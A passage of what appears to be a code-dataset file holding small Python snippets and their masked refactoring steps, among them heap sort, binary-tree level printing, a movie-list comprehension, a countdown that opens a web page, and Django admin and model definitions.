pobierz_polozenie(self):\n print(\"Metoda pobierz_polozenie klasy XXOkrag.\")\n def nadaj_polozenie(self):\n print(\"Metoda nadaj_polozenie klasy XXOkrag.\")\n def ustaw_kolor(self):\n print(\"Metoda ustaw_kolor klasy XXOkrag.\")\n\nclass Okrag(Figura):\n def __init__(self):\n self.xokrag = XXOkrag()\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n def nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n def wypelnij(self):\n self.xokrag.wypelniaj()\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n def usun(self):\n self.xokrag.usuwaj()\n\nif __name__ == \"__main__\":\n\n lista_figur = [Linia(), Kwadrat(), Okrag()]\n\n for fig in lista_figur:\n fig.wyswietl()\n",
"step-ids": [
27,
30,
31,
34,
41
]
}
|
[
27,
30,
31,
34,
41
] |
def heapify(lst, index, heap_size):
largest = index
left_index = 2 * index + 1
right_index = 2 * index + 2
if left_index < heap_size and lst[left_index] > lst[largest]:
largest = left_index
if right_index < heap_size and lst[right_index] > lst[largest]:
largest = right_index
if largest != index:
lst[largest], lst[index] = lst[index], lst[largest]
heapify(lst, largest, heap_size)
def heap_sort(collection):
"""Pure implement of heap sort algorithm in Python
:param collection: some mutable ordered collection with heterogeneous
comparable items inside
:return: the same collection ordered by ascending
"""
n = len(collection)
for i in range(n // 2 - 1, -1, -1):
heapify(collection, i, n)
for i in range(n - 1, 0, -1):
collection[0], collection[i] = collection[i], collection[0]
heapify(collection, 0, i)
return collection
|
normal
|
{
"blob_id": "d8ea396ff8514cc10e02072ea478f0276584153d",
"index": 3274,
"step-1": "<mask token>\n",
"step-2": "def heapify(lst, index, heap_size):\n largest = index\n left_index = 2 * index + 1\n right_index = 2 * index + 2\n if left_index < heap_size and lst[left_index] > lst[largest]:\n largest = left_index\n if right_index < heap_size and lst[right_index] > lst[largest]:\n largest = right_index\n if largest != index:\n lst[largest], lst[index] = lst[index], lst[largest]\n heapify(lst, largest, heap_size)\n\n\n<mask token>\n",
"step-3": "def heapify(lst, index, heap_size):\n largest = index\n left_index = 2 * index + 1\n right_index = 2 * index + 2\n if left_index < heap_size and lst[left_index] > lst[largest]:\n largest = left_index\n if right_index < heap_size and lst[right_index] > lst[largest]:\n largest = right_index\n if largest != index:\n lst[largest], lst[index] = lst[index], lst[largest]\n heapify(lst, largest, heap_size)\n\n\ndef heap_sort(collection):\n \"\"\"Pure implement of heap sort algorithm in Python\n\n :param collection: some mutable ordered collection with heterogeneous\n comparable items inside\n :return: the same collection ordered by ascending\n \"\"\"\n n = len(collection)\n for i in range(n // 2 - 1, -1, -1):\n heapify(collection, i, n)\n for i in range(n - 1, 0, -1):\n collection[0], collection[i] = collection[i], collection[0]\n heapify(collection, 0, i)\n return collection\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
users = {1: "Tom", 2: "Bob", 3: "Bill"}
elements = {"Au": "Oltin", "Fe": "Temir", "H": "Vodorod", "O": "Kislorod"}
|
normal
|
{
"blob_id": "a24ab93983546f8ae0fab042c121ac52388e62e8",
"index": 2967,
"step-1": "<mask token>\n",
"step-2": "users = {(1): 'Tom', (2): 'Bob', (3): 'Bill'}\nelements = {'Au': 'Oltin', 'Fe': 'Temir', 'H': 'Vodorod', 'O': 'Kislorod'}\n",
"step-3": "users = {1: \"Tom\", 2: \"Bob\", 3: \"Bill\"}\n\nelements = {\"Au\": \"Oltin\", \"Fe\": \"Temir\", \"H\": \"Vodorod\", \"O\": \"Kislorod\"}",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class PrintTree(object):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class PrintTree(object):
def printTree(self, root):
if not root:
return
"""
定义next_last为下一层的最后一个,cur_last为当前层最后一个
temp用于存放当前行的值,resutl存放最终的结果
"""
next_last = cur_last = root
_queue = [root]
result, temp = [], []
while _queue:
_cur = _queue.pop(0)
temp.append(_cur.val)
if _cur.left:
_queue.append(_cur.left)
next_last = _cur.left
if _cur.right:
_queue.append(_cur.right)
next_last = _cur.right
if _cur == cur_last:
result.append(temp)
temp = []
cur_last = next_last
return result
<|reserved_special_token_1|>
class TreeNode(object):
<|reserved_special_token_0|>
class PrintTree(object):
def printTree(self, root):
if not root:
return
"""
定义next_last为下一层的最后一个,cur_last为当前层最后一个
temp用于存放当前行的值,resutl存放最终的结果
"""
next_last = cur_last = root
_queue = [root]
result, temp = [], []
while _queue:
_cur = _queue.pop(0)
temp.append(_cur.val)
if _cur.left:
_queue.append(_cur.left)
next_last = _cur.left
if _cur.right:
_queue.append(_cur.right)
next_last = _cur.right
if _cur == cur_last:
result.append(temp)
temp = []
cur_last = next_last
return result
<|reserved_special_token_1|>
class TreeNode(object):
def __init__(self, val):
self.val = val
self.left = None
self.right = None
class PrintTree(object):
def printTree(self, root):
if not root:
return
"""
定义next_last为下一层的最后一个,cur_last为当前层最后一个
temp用于存放当前行的值,resutl存放最终的结果
"""
next_last = cur_last = root
_queue = [root]
result, temp = [], []
while _queue:
_cur = _queue.pop(0)
temp.append(_cur.val)
if _cur.left:
_queue.append(_cur.left)
next_last = _cur.left
if _cur.right:
_queue.append(_cur.right)
next_last = _cur.right
if _cur == cur_last:
result.append(temp)
temp = []
cur_last = next_last
return result
<|reserved_special_token_1|>
# _*_ coding: utf-8 _*_
# 按层打印二叉树
class TreeNode(object):
def __init__(self, val):
self.val = val
self.left = None
self.right = None
class PrintTree(object):
def printTree(self, root):
if not root:
return
'''
定义next_last为下一层的最后一个,cur_last为当前层最后一个
temp用于存放当前行的值,resutl存放最终的结果
'''
next_last = cur_last = root
_queue = [root]
result, temp = [], []
while _queue:
# 在按层遍历的基础上,不断把下层最右边儿子赋值给next_last
_cur = _queue.pop(0)
temp.append(_cur.val)
if _cur.left:
_queue.append(_cur.left)
next_last = _cur.left
if _cur.right:
_queue.append(_cur.right)
next_last = _cur.right
# 如果当前节点为此层最后的节点时,
# 进行下层最后一个节点的赋值(cur_last=next_last),然后才由_queue.pop(0)进入下层
if _cur == cur_last:
result.append(temp)
temp = []
cur_last = next_last
return result
|
flexible
|
{
"blob_id": "4ddff57790ad191fc29fc092bcc714f0b6273100",
"index": 7755,
"step-1": "<mask token>\n\n\nclass PrintTree(object):\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass PrintTree(object):\n\n def printTree(self, root):\n if not root:\n return\n \"\"\"\n 定义next_last为下一层的最后一个,cur_last为当前层最后一个\n temp用于存放当前行的值,resutl存放最终的结果\n \"\"\"\n next_last = cur_last = root\n _queue = [root]\n result, temp = [], []\n while _queue:\n _cur = _queue.pop(0)\n temp.append(_cur.val)\n if _cur.left:\n _queue.append(_cur.left)\n next_last = _cur.left\n if _cur.right:\n _queue.append(_cur.right)\n next_last = _cur.right\n if _cur == cur_last:\n result.append(temp)\n temp = []\n cur_last = next_last\n return result\n",
"step-3": "class TreeNode(object):\n <mask token>\n\n\nclass PrintTree(object):\n\n def printTree(self, root):\n if not root:\n return\n \"\"\"\n 定义next_last为下一层的最后一个,cur_last为当前层最后一个\n temp用于存放当前行的值,resutl存放最终的结果\n \"\"\"\n next_last = cur_last = root\n _queue = [root]\n result, temp = [], []\n while _queue:\n _cur = _queue.pop(0)\n temp.append(_cur.val)\n if _cur.left:\n _queue.append(_cur.left)\n next_last = _cur.left\n if _cur.right:\n _queue.append(_cur.right)\n next_last = _cur.right\n if _cur == cur_last:\n result.append(temp)\n temp = []\n cur_last = next_last\n return result\n",
"step-4": "class TreeNode(object):\n\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\n\nclass PrintTree(object):\n\n def printTree(self, root):\n if not root:\n return\n \"\"\"\n 定义next_last为下一层的最后一个,cur_last为当前层最后一个\n temp用于存放当前行的值,resutl存放最终的结果\n \"\"\"\n next_last = cur_last = root\n _queue = [root]\n result, temp = [], []\n while _queue:\n _cur = _queue.pop(0)\n temp.append(_cur.val)\n if _cur.left:\n _queue.append(_cur.left)\n next_last = _cur.left\n if _cur.right:\n _queue.append(_cur.right)\n next_last = _cur.right\n if _cur == cur_last:\n result.append(temp)\n temp = []\n cur_last = next_last\n return result\n",
"step-5": "# _*_ coding: utf-8 _*_\n\n# 按层打印二叉树\n\n\nclass TreeNode(object):\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\n\nclass PrintTree(object):\n def printTree(self, root):\n if not root:\n return\n '''\n 定义next_last为下一层的最后一个,cur_last为当前层最后一个\n temp用于存放当前行的值,resutl存放最终的结果\n '''\n next_last = cur_last = root\n _queue = [root]\n result, temp = [], []\n while _queue:\n # 在按层遍历的基础上,不断把下层最右边儿子赋值给next_last\n _cur = _queue.pop(0)\n temp.append(_cur.val)\n if _cur.left:\n _queue.append(_cur.left)\n next_last = _cur.left\n if _cur.right:\n _queue.append(_cur.right)\n next_last = _cur.right\n # 如果当前节点为此层最后的节点时,\n # 进行下层最后一个节点的赋值(cur_last=next_last),然后才由_queue.pop(0)进入下层\n if _cur == cur_last:\n result.append(temp)\n temp = []\n cur_last = next_last\n return result\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(selected_movies)
<|reserved_special_token_0|>
print(selected_movies2)
<|reserved_special_token_1|>
movies = ['Abraham Lincoln', 'Blue Steel', 'Behind Office Doors',
'Bowery at Midnight', 'Captain Kidd', 'Debbie Does Dallas',
'The Emperor Jones', 'Rain']
movies_tuple = [('Abraham Lincoln', 1993), ('Blue Steel', 1938), (
'Behind Office Doors', 1999), ('Bowery at Midnight', 2000), (
'Captain Kidd', 2010), ('Debbie Does Dallas', 1908), (
'The Emperor Jones', 2016), ('Rain', 2011)]
selected_movies = [title for title in movies if title.startswith('B')]
print(selected_movies)
selected_movies2 = [title for title, year in movies_tuple if year < 2000]
print(selected_movies2)
<|reserved_special_token_1|>
movies = ["Abraham Lincoln", "Blue Steel", "Behind Office Doors", "Bowery at Midnight", "Captain Kidd", "Debbie Does Dallas", "The Emperor Jones", "Rain"]
movies_tuple = [("Abraham Lincoln", 1993), ("Blue Steel", 1938), ("Behind Office Doors", 1999), ("Bowery at Midnight", 2000), ("Captain Kidd",2010), ("Debbie Does Dallas",1908), ("The Emperor Jones", 2016), ("Rain", 2011)]
# selected_movies = []
# for title in movies:
# if title.startswith("B"):
# selected_movies.append(title)
#list_comprehension
# [expr for val in collection]
# [expr for val in collection if <test>]
# [expr for val in collection if <test> and <test2>]
# [expr for val1 in collection1 and val2 in collection2]
#find movies that starts with "B"
selected_movies = [title for title in movies if title.startswith("B")]
print(selected_movies)
#this is for tuples--- find movies released before 2000
selected_movies2 = [title for (title, year) in movies_tuple if year <2000 ]
print (selected_movies2)
|
flexible
|
{
"blob_id": "8435a69ee9793435c7483df9bb15f01ef8051479",
"index": 3340,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(selected_movies)\n<mask token>\nprint(selected_movies2)\n",
"step-3": "movies = ['Abraham Lincoln', 'Blue Steel', 'Behind Office Doors',\n 'Bowery at Midnight', 'Captain Kidd', 'Debbie Does Dallas',\n 'The Emperor Jones', 'Rain']\nmovies_tuple = [('Abraham Lincoln', 1993), ('Blue Steel', 1938), (\n 'Behind Office Doors', 1999), ('Bowery at Midnight', 2000), (\n 'Captain Kidd', 2010), ('Debbie Does Dallas', 1908), (\n 'The Emperor Jones', 2016), ('Rain', 2011)]\nselected_movies = [title for title in movies if title.startswith('B')]\nprint(selected_movies)\nselected_movies2 = [title for title, year in movies_tuple if year < 2000]\nprint(selected_movies2)\n",
"step-4": "movies = [\"Abraham Lincoln\", \"Blue Steel\", \"Behind Office Doors\", \"Bowery at Midnight\", \"Captain Kidd\", \"Debbie Does Dallas\", \"The Emperor Jones\", \"Rain\"]\n\nmovies_tuple = [(\"Abraham Lincoln\", 1993), (\"Blue Steel\", 1938), (\"Behind Office Doors\", 1999), (\"Bowery at Midnight\", 2000), (\"Captain Kidd\",2010), (\"Debbie Does Dallas\",1908), (\"The Emperor Jones\", 2016), (\"Rain\", 2011)]\n\n# selected_movies = []\n# for title in movies:\n# if title.startswith(\"B\"):\n# selected_movies.append(title)\n\n#list_comprehension\n\n# [expr for val in collection]\n# [expr for val in collection if <test>]\n# [expr for val in collection if <test> and <test2>]\n# [expr for val1 in collection1 and val2 in collection2]\n\n#find movies that starts with \"B\"\nselected_movies = [title for title in movies if title.startswith(\"B\")]\nprint(selected_movies)\n\n\n#this is for tuples--- find movies released before 2000\nselected_movies2 = [title for (title, year) in movies_tuple if year <2000 ]\nprint (selected_movies2)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import webbrowser
import time
x=10
while x > 0:
print (x), time.sleep(1)
x=x-1
while x==0:
print ("MEOW")
webbrowser.open("https://www.youtube.com/watch?v=IuysY1BekOE")
|
normal
|
{
"blob_id": "4d31357936ce53b2be5f9a952b99df58baffe7ea",
"index": 4937,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile x > 0:\n print(x), time.sleep(1)\n x = x - 1\nwhile x == 0:\n print('MEOW')\n webbrowser.open('https://www.youtube.com/watch?v=IuysY1BekOE')\n",
"step-3": "<mask token>\nx = 10\nwhile x > 0:\n print(x), time.sleep(1)\n x = x - 1\nwhile x == 0:\n print('MEOW')\n webbrowser.open('https://www.youtube.com/watch?v=IuysY1BekOE')\n",
"step-4": "import webbrowser\nimport time\nx = 10\nwhile x > 0:\n print(x), time.sleep(1)\n x = x - 1\nwhile x == 0:\n print('MEOW')\n webbrowser.open('https://www.youtube.com/watch?v=IuysY1BekOE')\n",
"step-5": "import webbrowser\nimport time\nx=10\nwhile x > 0:\n print (x), time.sleep(1)\n x=x-1\nwhile x==0:\n print (\"MEOW\")\n webbrowser.open(\"https://www.youtube.com/watch?v=IuysY1BekOE\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class DatabaseAdmin(admin.ModelAdmin):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class AlarmAdmin(admin.ModelAdmin):
list_display = ['name', 'severity', 'query']
list_filter = ['severity']
<|reserved_special_token_0|>
class SystemAdmin(admin.ModelAdmin):
list_display = ['update_time', 'source_file']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GPSInline(admin.TabularInline):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class DatabaseAdmin(admin.ModelAdmin):
list_display = ('database_id', 'name', 'category',
'short_profiler_status', 'socrata_status', 'source_agency',
'has_bounding_box')
search_fields = ('profiler_status', 'database_id', 'category', 'name',
'description', 'owner', 'tags')
list_filter = ['profiler_status', 'category', 'owner', 'author',
'socrata_status']
prepopulated_fields = {'name': ('database_id',)}
inlines = [ColumnInline]
<|reserved_special_token_0|>
class AlarmAdmin(admin.ModelAdmin):
list_display = ['name', 'severity', 'query']
list_filter = ['severity']
<|reserved_special_token_0|>
class SystemAdmin(admin.ModelAdmin):
list_display = ['update_time', 'source_file']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ColumnInline(admin.TabularInline):
model = Column
class GPSInline(admin.TabularInline):
model = GpsData
classes = 'collapse',
class DatabaseAdmin(admin.ModelAdmin):
list_display = ('database_id', 'name', 'category',
'short_profiler_status', 'socrata_status', 'source_agency',
'has_bounding_box')
search_fields = ('profiler_status', 'database_id', 'category', 'name',
'description', 'owner', 'tags')
list_filter = ['profiler_status', 'category', 'owner', 'author',
'socrata_status']
prepopulated_fields = {'name': ('database_id',)}
inlines = [ColumnInline]
<|reserved_special_token_0|>
class AlarmAdmin(admin.ModelAdmin):
list_display = ['name', 'severity', 'query']
list_filter = ['severity']
<|reserved_special_token_0|>
class SystemAdmin(admin.ModelAdmin):
list_display = ['update_time', 'source_file']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ColumnInline(admin.TabularInline):
model = Column
class GPSInline(admin.TabularInline):
model = GpsData
classes = 'collapse',
class DatabaseAdmin(admin.ModelAdmin):
list_display = ('database_id', 'name', 'category',
'short_profiler_status', 'socrata_status', 'source_agency',
'has_bounding_box')
search_fields = ('profiler_status', 'database_id', 'category', 'name',
'description', 'owner', 'tags')
list_filter = ['profiler_status', 'category', 'owner', 'author',
'socrata_status']
prepopulated_fields = {'name': ('database_id',)}
inlines = [ColumnInline]
admin.site.register(Database, DatabaseAdmin)
class AlarmAdmin(admin.ModelAdmin):
list_display = ['name', 'severity', 'query']
list_filter = ['severity']
admin.site.register(Alarm, AlarmAdmin)
class SystemAdmin(admin.ModelAdmin):
list_display = ['update_time', 'source_file']
admin.site.register(System, SystemAdmin)
<|reserved_special_token_1|>
from django.contrib import admin
# from django.contrib.admin import AdminSite
# class MyAdminSite(AdminSite):
# site_header = 'Finder Administration'
# admin_site = MyAdminSite(name='Finder Admin')
from finder.models import Database, Column, GpsData, Alarm, System
class ColumnInline(admin.TabularInline):
model = Column
class GPSInline(admin.TabularInline):
model = GpsData
classes= ('collapse',)
class DatabaseAdmin(admin.ModelAdmin):
# fieldsets = [
# (None, {'fields': ['database_id']}),
# ('Database Info', {#'classes': ('collapse',),
# 'fields': ['rows',
# 'missing_rows',
# 'columns_count',
# 'columns_geo_count',
# 'columns_numeric_count',
# 'columns_temporal_count',
# 'columns_text_count',
# 'values',
# 'values_missing']}
# ),
# ('Profiler Info', {#'classes': ('collapse',),
# 'fields': ['profiler_input_file',
# 'profiler_status',
# 'profiler_time_begin',
# 'profiler_time_end',
# 'socrata_author',
# 'socrata_download_count',
# 'socrata_view_count']}
# ),
# ('Socrata Metadata', {#'classes': ('collapse',),
# 'fields': ['socrata_status',
# 'socrata_description',
# 'socrata_category',
# 'socrata_owner',
# 'socrata_author',
# 'socrata_download_count',
# 'socrata_view_count']}
# ),
# ('GPS Data', {#'classes': ('collapse',),
# 'fields': [ 'gps_values', 'lat_min', 'lat_max', 'long_min', 'long_max']}
# ),
# ]
list_display = ('database_id', 'name', 'category', 'short_profiler_status', 'socrata_status',
#'socrata_primary', 'rows', 'columns_count', 'missing_percent',
'source_agency',
'has_bounding_box')
search_fields = ('profiler_status','database_id','category','name', 'description','owner','tags',)
list_filter = ['profiler_status', 'category', 'owner', 'author', 'socrata_status']
prepopulated_fields = {'name': ('database_id',)}
inlines = [ColumnInline
#, GPSInline
]
admin.site.register(Database, DatabaseAdmin)
class AlarmAdmin(admin.ModelAdmin):
list_display = ['name', 'severity', 'query']
list_filter = ['severity']
admin.site.register(Alarm, AlarmAdmin)
class SystemAdmin(admin.ModelAdmin):
list_display = ['update_time', 'source_file']
admin.site.register(System, SystemAdmin)
|
flexible
|
{
"blob_id": "e1968e0d6146ce7656505eeed8e9f31daa4b558a",
"index": 5447,
"step-1": "<mask token>\n\n\nclass DatabaseAdmin(admin.ModelAdmin):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n\n\nclass AlarmAdmin(admin.ModelAdmin):\n list_display = ['name', 'severity', 'query']\n list_filter = ['severity']\n\n\n<mask token>\n\n\nclass SystemAdmin(admin.ModelAdmin):\n list_display = ['update_time', 'source_file']\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass GPSInline(admin.TabularInline):\n <mask token>\n <mask token>\n\n\nclass DatabaseAdmin(admin.ModelAdmin):\n list_display = ('database_id', 'name', 'category',\n 'short_profiler_status', 'socrata_status', 'source_agency',\n 'has_bounding_box')\n search_fields = ('profiler_status', 'database_id', 'category', 'name',\n 'description', 'owner', 'tags')\n list_filter = ['profiler_status', 'category', 'owner', 'author',\n 'socrata_status']\n prepopulated_fields = {'name': ('database_id',)}\n inlines = [ColumnInline]\n\n\n<mask token>\n\n\nclass AlarmAdmin(admin.ModelAdmin):\n list_display = ['name', 'severity', 'query']\n list_filter = ['severity']\n\n\n<mask token>\n\n\nclass SystemAdmin(admin.ModelAdmin):\n list_display = ['update_time', 'source_file']\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ColumnInline(admin.TabularInline):\n model = Column\n\n\nclass GPSInline(admin.TabularInline):\n model = GpsData\n classes = 'collapse',\n\n\nclass DatabaseAdmin(admin.ModelAdmin):\n list_display = ('database_id', 'name', 'category',\n 'short_profiler_status', 'socrata_status', 'source_agency',\n 'has_bounding_box')\n search_fields = ('profiler_status', 'database_id', 'category', 'name',\n 'description', 'owner', 'tags')\n list_filter = ['profiler_status', 'category', 'owner', 'author',\n 'socrata_status']\n prepopulated_fields = {'name': ('database_id',)}\n inlines = [ColumnInline]\n\n\n<mask token>\n\n\nclass AlarmAdmin(admin.ModelAdmin):\n list_display = ['name', 'severity', 'query']\n list_filter = ['severity']\n\n\n<mask token>\n\n\nclass SystemAdmin(admin.ModelAdmin):\n list_display = ['update_time', 'source_file']\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass ColumnInline(admin.TabularInline):\n model = Column\n\n\nclass GPSInline(admin.TabularInline):\n model = GpsData\n classes = 'collapse',\n\n\nclass DatabaseAdmin(admin.ModelAdmin):\n list_display = ('database_id', 'name', 'category',\n 'short_profiler_status', 'socrata_status', 'source_agency',\n 'has_bounding_box')\n search_fields = ('profiler_status', 'database_id', 'category', 'name',\n 'description', 'owner', 'tags')\n list_filter = ['profiler_status', 'category', 'owner', 'author',\n 'socrata_status']\n prepopulated_fields = {'name': ('database_id',)}\n inlines = [ColumnInline]\n\n\nadmin.site.register(Database, DatabaseAdmin)\n\n\nclass AlarmAdmin(admin.ModelAdmin):\n list_display = ['name', 'severity', 'query']\n list_filter = ['severity']\n\n\nadmin.site.register(Alarm, AlarmAdmin)\n\n\nclass SystemAdmin(admin.ModelAdmin):\n list_display = ['update_time', 'source_file']\n\n\nadmin.site.register(System, SystemAdmin)\n",
"step-5": "from django.contrib import admin\n\n# from django.contrib.admin import AdminSite\n# class MyAdminSite(AdminSite):\n# site_header = 'Finder Administration'\n# admin_site = MyAdminSite(name='Finder Admin')\n\n\nfrom finder.models import Database, Column, GpsData, Alarm, System\n\nclass ColumnInline(admin.TabularInline):\n model = Column\n\nclass GPSInline(admin.TabularInline):\n model = GpsData\n classes= ('collapse',)\n\n\nclass DatabaseAdmin(admin.ModelAdmin):\n # fieldsets = [\n # \t\t\t\t(None, {'fields': ['database_id']}),\n # \t\t\t\t('Database Info', {#'classes': ('collapse',),\n # \t\t\t\t\t\t\t\t'fields': ['rows',\n # \t\t\t\t\t\t\t\t\t\t\t 'missing_rows', \n # \t\t\t\t\t\t\t\t\t\t\t 'columns_count',\n # \t\t\t\t\t\t\t\t\t\t\t 'columns_geo_count',\n # \t\t\t\t\t\t\t\t\t\t\t 'columns_numeric_count', \n # \t\t\t\t\t\t\t\t\t\t\t 'columns_temporal_count',\n # \t\t\t\t\t\t\t\t\t\t\t 'columns_text_count',\n # \t\t\t\t\t\t\t\t\t\t\t 'values',\n # \t\t\t\t\t\t\t\t\t\t\t 'values_missing']}\n # \t\t\t),\n # \t\t\t('Profiler Info', {#'classes': ('collapse',),\n # \t\t\t\t\t\t\t\t'fields': ['profiler_input_file',\n # \t\t\t\t\t\t\t\t\t\t\t 'profiler_status', \n # \t\t\t\t\t\t\t\t\t\t\t 'profiler_time_begin',\n # \t\t\t\t\t\t\t\t\t\t\t 'profiler_time_end',\n # \t\t\t\t\t\t\t\t\t\t\t 'socrata_author', \n # \t\t\t\t\t\t\t\t\t\t\t 'socrata_download_count',\n # \t\t\t\t\t\t\t\t\t\t\t 'socrata_view_count']}\n # \t\t\t),\n # \t\t\t('Socrata Metadata', {#'classes': ('collapse',),\n # \t\t\t\t\t\t\t\t'fields': ['socrata_status',\n # \t\t\t\t\t\t\t\t\t\t\t 'socrata_description', \n # \t\t\t\t\t\t\t\t\t\t\t 'socrata_category',\n # \t\t\t\t\t\t\t\t\t\t\t 'socrata_owner',\n # \t\t\t\t\t\t\t\t\t\t\t 'socrata_author', \n # \t\t\t\t\t\t\t\t\t\t\t 'socrata_download_count',\n # \t\t\t\t\t\t\t\t\t\t\t 'socrata_view_count']}\n # \t\t\t),\n # \t\t\t('GPS Data', {#'classes': ('collapse',),\n # \t\t\t\t\t\t\t\t'fields': [ 'gps_values', 'lat_min', 'lat_max', 'long_min', 'long_max']}\n # \t\t\t),\n # \t\t\t]\n\n list_display = ('database_id', 'name', 'category', 'short_profiler_status', 'socrata_status', \n #'socrata_primary', 'rows', 'columns_count', 'missing_percent', \n 'source_agency',\n 'has_bounding_box')\n search_fields = ('profiler_status','database_id','category','name', 'description','owner','tags',)\n list_filter = ['profiler_status', 'category', 'owner', 'author', 'socrata_status']\n\n prepopulated_fields = {'name': ('database_id',)}\n\n inlines = [ColumnInline\n #, GPSInline\n ]\n \nadmin.site.register(Database, DatabaseAdmin)\n\nclass AlarmAdmin(admin.ModelAdmin):\n list_display = ['name', 'severity', 'query']\n list_filter = ['severity']\n\nadmin.site.register(Alarm, AlarmAdmin)\n\nclass SystemAdmin(admin.ModelAdmin):\n list_display = ['update_time', 'source_file']\n\nadmin.site.register(System, SystemAdmin)\n\n",
"step-ids": [
5,
7,
10,
11,
13
]
}
|
[
5,
7,
10,
11,
13
] |
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.core.urlresolvers import reverse
import datetime
class Document(models.Model):
document = models.FileField(upload_to='documents/')
uploaded_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return str(self.document)
class Assignment(models.Model):
name= models.CharField(max_length=250)
technology= models.CharField(max_length=100)
directory= models.CharField(max_length=500, default="NA")
def __str__(self):
return self.name + '-' + self.technology
class Assestment(models.Model):
name= models.CharField(max_length=250)
technology= models.CharField(max_length=100)
username= models.CharField(max_length=100, default="NA")
date = models.DateTimeField(default=datetime.datetime.now, blank=True)
def __str__(self):
return self.name + '-' + self.technology
class UserProfile(models.Model):
user = models.OneToOneField(User)
email = models.CharField(max_length=100)
phone = models.IntegerField(default=0)
city = models.CharField(max_length=100)
def create_profile(sender, **kwargs):
if kwargs['created']:
user_profile = UserProfile.objects.create(user=kwargs['instance'])
post_save.connect(create_profile, sender=User)
|
normal
|
{
"blob_id": "01b14da7d081a67bab6f9921bb1a6a4c3d5ac216",
"index": 3003,
"step-1": "<mask token>\n\n\nclass Assignment(models.Model):\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.name + '-' + self.technology\n\n\nclass Assestment(models.Model):\n name = models.CharField(max_length=250)\n technology = models.CharField(max_length=100)\n username = models.CharField(max_length=100, default='NA')\n date = models.DateTimeField(default=datetime.datetime.now, blank=True)\n\n def __str__(self):\n return self.name + '-' + self.technology\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n email = models.CharField(max_length=100)\n phone = models.IntegerField(default=0)\n city = models.CharField(max_length=100)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Assignment(models.Model):\n name = models.CharField(max_length=250)\n technology = models.CharField(max_length=100)\n directory = models.CharField(max_length=500, default='NA')\n\n def __str__(self):\n return self.name + '-' + self.technology\n\n\nclass Assestment(models.Model):\n name = models.CharField(max_length=250)\n technology = models.CharField(max_length=100)\n username = models.CharField(max_length=100, default='NA')\n date = models.DateTimeField(default=datetime.datetime.now, blank=True)\n\n def __str__(self):\n return self.name + '-' + self.technology\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n email = models.CharField(max_length=100)\n phone = models.IntegerField(default=0)\n city = models.CharField(max_length=100)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Document(models.Model):\n document = models.FileField(upload_to='documents/')\n uploaded_at = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return str(self.document)\n\n\nclass Assignment(models.Model):\n name = models.CharField(max_length=250)\n technology = models.CharField(max_length=100)\n directory = models.CharField(max_length=500, default='NA')\n\n def __str__(self):\n return self.name + '-' + self.technology\n\n\nclass Assestment(models.Model):\n name = models.CharField(max_length=250)\n technology = models.CharField(max_length=100)\n username = models.CharField(max_length=100, default='NA')\n date = models.DateTimeField(default=datetime.datetime.now, blank=True)\n\n def __str__(self):\n return self.name + '-' + self.technology\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n email = models.CharField(max_length=100)\n phone = models.IntegerField(default=0)\n city = models.CharField(max_length=100)\n\n\n<mask token>\n",
"step-4": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.core.urlresolvers import reverse\nimport datetime\n\n\nclass Document(models.Model):\n document = models.FileField(upload_to='documents/')\n uploaded_at = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return str(self.document)\n\n\nclass Assignment(models.Model):\n name = models.CharField(max_length=250)\n technology = models.CharField(max_length=100)\n directory = models.CharField(max_length=500, default='NA')\n\n def __str__(self):\n return self.name + '-' + self.technology\n\n\nclass Assestment(models.Model):\n name = models.CharField(max_length=250)\n technology = models.CharField(max_length=100)\n username = models.CharField(max_length=100, default='NA')\n date = models.DateTimeField(default=datetime.datetime.now, blank=True)\n\n def __str__(self):\n return self.name + '-' + self.technology\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n email = models.CharField(max_length=100)\n phone = models.IntegerField(default=0)\n city = models.CharField(max_length=100)\n\n\ndef create_profile(sender, **kwargs):\n if kwargs['created']:\n user_profile = 